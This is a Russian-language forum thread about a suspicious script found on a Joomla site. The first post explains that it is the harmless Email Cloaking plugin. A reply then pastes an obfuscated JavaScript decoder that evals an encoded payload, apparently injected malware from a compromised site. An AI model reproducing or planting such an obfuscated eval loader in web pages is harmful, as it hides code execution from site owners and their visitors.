×
HeadHunter and Superjob rezume updater on Ruby on Rails (21 авг 2017)

Практикуемся в написании кода под rails.

Вопрос Странный скрипт на сайте

Больше
6 года 8 мес. назад #1 от Aleksej
Aleksej создал эту тему: Странный скрипт на сайте
Заходим на страничку "Контакты" сайта... и глазам своим не верим:
<script type="text/javascript">// <![CDATA[
// <![CDATA[
 var prefix = 'm&#97;&#105;lt&#111;:';
 var suffix = '';
 var attribs = '';
 var path = 'hr' + 'ef' + '=';
 var addy52547 = '&#105;nf&#111;' + '&#64;';
 addy52547 = addy52547 + 'm&#97;st&#101;rpr&#111;' + '&#46;' + 'ws';
 document.write( '<a ' + path + '\'' + prefix + addy52547 + suffix + '\'' + attribs + '>' );
 document.write( addy52547 );
 document.write( '<\/a>' );
// ]]></script>
Что-то ужасное! Ведь мы точно помним, что ничего подобного не прописывали на этой страничке! И вообще мы со скриптами на "вы"... что же это? вирус? или хакер? сайт, получается, взломан, нужно спешно менять пароли или, возможно, все сносить и восстанавливать из прошлогодней резервной копии? :laugh:

Не спешите! все не так плохо.

Скрипт добавляет на страницу следующую ссылку:
<a href='m&#97;&#105;lt&#111;:&#105;nf&#111;&#64;m&#97;st&#101;rpr&#111;&#46;ws'>&#105;nf&#111;&#64;m&#97;st&#101;rpr&#111;&#46;ws</a>
Что равносильно -

<a href='Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.'>Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.</a>

Таким образом - попросту сработал плагин Joomla, носящий имя Content - Email Cloaking - вы всегда можете разглядеть его чуть пристальнее, открыв Расширения - Плагины:

Прячет все e-mail адреса в материалах от спамботов (используя JavaScript)

А значит - нет смысла пугаться, все ок. :)

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 7 мес. назад #2 от serge
serge ответил в теме Re: Странный скрипт на сайте
У меня был похуже случай...
<script language=JavaScript>/*function varrban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,61, 36,43,5,10,7,46,16,48,0,0,0,0,0,0,19,56,4,39,57,34 ,35,50,23,9,27,31,45,44,41,62,18,32,59,25,13,28,40 ,3,52,17,1,0,0,0,0,60,0,6,30,55,49,38,11,21,14,53, 12,33,24,29,15,37,54,26,2,58,47,51,8,20,22,42,0);f or(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(240^w&255);w>>=8 ;s-=2}else{s=6}}}eval(r);}}varrban('6eNCwODkbnvkYPlkW p_iXONCgb1GwOD24pSobPVc65leBxIpHuUex5l2mxIXbaSCgpM 2gqS28nVQ@pMXlPvkzy_cKKS2BxIdYPDQbRSoBOTkK0_iJcJ2B ENcrOSkbPIp1aIklsLQYsIoKpIpS3L94FU9rC1pHfSoxaDiJKL X8KlewPveTf_9IWTegeDolPluZWjG8nvkIGSoTfToShvQUaSE5 RDCbxNXhu_cSqNQYpSohKmp')*/</script><!-- logisticsmoldova.com -->

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.